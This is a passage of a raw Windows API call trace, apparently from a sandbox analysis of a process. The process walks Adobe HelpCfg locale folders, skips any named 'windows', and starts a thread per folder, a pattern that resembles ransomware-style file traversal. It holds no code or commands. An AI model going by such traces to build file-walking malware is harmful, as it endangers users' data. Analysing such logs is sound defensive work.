returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*" [0048.939] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c7e570, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.952] CloseHandle (hObject=0x260) returned 1 [0048.952] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi_FI", cAlternateFileName="")) returned 1 [0048.952] lstrcmpW (lpString1=".", lpString2="fi_FI") returned -1 [0048.952] lstrcmpW (lpString1="..", lpString2="fi_FI") returned -1 [0048.952] lstrcmpiW (lpString1="windows", lpString2="fi_FI") returned 1 [0048.952] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.952] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.952] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="fi_FI" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" [0048.952] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*" [0048.952] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24538320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.961] CloseHandle (hObject=0x260) returned 1 [0048.961] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr_FR", cAlternateFileName="")) returned 1 [0048.961] lstrcmpW (lpString1=".", lpString2="fr_FR") returned -1 [0048.961] lstrcmpW (lpString1="..", lpString2="fr_FR") returned -1 [0048.961] lstrcmpiW (lpString1="windows", lpString2="fr_FR") returned 1 [0048.964] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.964] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.964] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="fr_FR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" [0048.964] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*" [0048.964] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.964] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24cc66a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.975] CloseHandle (hObject=0x260) returned 1 [0048.975] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr_HR", cAlternateFileName="")) returned 1 [0048.975] lstrcmpW (lpString1=".", lpString2="hr_HR") returned -1 [0048.975] lstrcmpW (lpString1="..", lpString2="hr_HR") returned -1 [0048.975] lstrcmpiW (lpString1="windows", lpString2="hr_HR") returned 1 [0048.977] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.977] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.977] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="hr_HR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" [0048.977] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*" [0048.977] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24cf6778, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0048.991] CloseHandle (hObject=0x260) returned 1 [0048.991] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu_HU", cAlternateFileName="")) returned 1 [0048.991] lstrcmpW (lpString1=".", lpString2="hu_HU") returned -1 [0048.991] lstrcmpW (lpString1="..", lpString2="hu_HU") returned -1 [0048.991] lstrcmpiW (lpString1="windows", lpString2="hu_HU") returned 1 [0048.993] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0048.993] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0048.993] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="hu_HU" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" [0048.993] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*" [0048.993] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0048.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d3e8b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0049.005] CloseHandle (hObject=0x260) returned 1 [0049.005] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it_IT", cAlternateFileName="")) returned 1 [0049.006] lstrcmpW (lpString1=".", lpString2="it_IT") returned -1 [0049.006] lstrcmpW (lpString1="..", lpString2="it_IT") returned -1 [0049.006] lstrcmpiW (lpString1="windows", lpString2="it_IT") returned 1 [0049.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0049.006] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0049.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="it_IT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" [0049.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*" [0049.006] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0049.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99d2d90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0049.012] CloseHandle (hObject=0x260) returned 1 [0049.012] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja_JP", cAlternateFileName="")) returned 1 [0049.012] lstrcmpW (lpString1=".", lpString2="ja_JP") returned -1 [0049.012] lstrcmpW (lpString1="..", lpString2="ja_JP") returned -1 [0049.012] lstrcmpiW (lpString1="windows", lpString2="ja_JP") returned 1 [0049.013] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0049.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0049.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="ja_JP" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" [0049.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*" [0049.013] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0049.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d869e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0049.019] CloseHandle (hObject=0x260) returned 1 [0049.019] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko_KR", cAlternateFileName="")) returned 1 [0049.019] lstrcmpW (lpString1=".", lpString2="ko_KR") returned -1 [0049.019] lstrcmpW (lpString1="..", lpString2="ko_KR") returned -1 [0049.019] lstrcmpiW (lpString1="windows", lpString2="ko_KR") returned 1 [0049.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0049.019] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0049.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="ko_KR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" [0049.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*" [0049.019] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0049.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5bd0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0049.025] CloseHandle (hObject=0x260) returned 1 [0049.025] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb_NO", cAlternateFileName="")) returned 1 [0049.025] lstrcmpW (lpString1=".", lpString2="nb_NO") returned -1 [0049.025] lstrcmpW (lpString1="..", lpString2="nb_NO") returned -1 [0049.025] lstrcmpiW (lpString1="windows", lpString2="nb_NO") returned 1 [0049.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0049.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0049.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="nb_NO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" [0049.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*" [0049.025] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0049.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5be80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0049.469] CloseHandle (hObject=0x260) returned 1 [0049.470] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl_NL", cAlternateFileName="")) returned 1 [0049.470] lstrcmpW (lpString1=".", lpString2="nl_NL") returned -1 [0049.470] lstrcmpW (lpString1="..", lpString2="nl_NL") returned -1 [0049.470] lstrcmpiW (lpString1="windows", lpString2="nl_NL") returned 1 [0050.061] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.061] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="nl_NL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" [0050.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*" [0050.061] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24eb6ed8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.068] CloseHandle (hObject=0x46c) returned 1 [0050.068] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl_PL", cAlternateFileName="")) returned 1 [0050.069] lstrcmpW (lpString1=".", lpString2="pl_PL") returned -1 [0050.069] lstrcmpW (lpString1="..", lpString2="pl_PL") returned -1 [0050.069] lstrcmpiW (lpString1="windows", lpString2="pl_PL") returned 1 [0050.071] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.071] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="pl_PL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" [0050.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*" [0050.071] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24eff010, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.080] CloseHandle (hObject=0x46c) returned 1 [0050.080] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0050.080] lstrcmpW (lpString1=".", lpString2="pt_BR") returned -1 [0050.080] lstrcmpW (lpString1="..", lpString2="pt_BR") returned -1 [0050.080] lstrcmpiW (lpString1="windows", lpString2="pt_BR") returned 1 [0050.084] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="pt_BR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" [0050.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*" [0050.084] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24f4f150, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0050.091] CloseHandle (hObject=0x46c) returned 1 [0050.091] FindNextFileW (in: hFindFile=0x671070, lpFindFileData=0x14bdfd30 | out: lpFindFileData=0x14bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro_RO", cAlternateFileName="")) returned 1 [0050.091] lstrcmpW (lpString1=".", lpString2="ro_RO") returned -1 [0050.091] lstrcmpW (lpString1="..", lpString2="ro_RO") returned -1 [0050.091] lstrcmpiW (lpString1="windows", lpString2="ro_RO") returned 1 [0050.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0050.094] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned 57 [0050.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\", lpString2="ro_RO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" [0050.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*" [0050.094] GlobalMemoryStatus (in: lpBuffer=0x14bdfd10 | out: lpBuffer=0x14bdfd10) [0050.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, 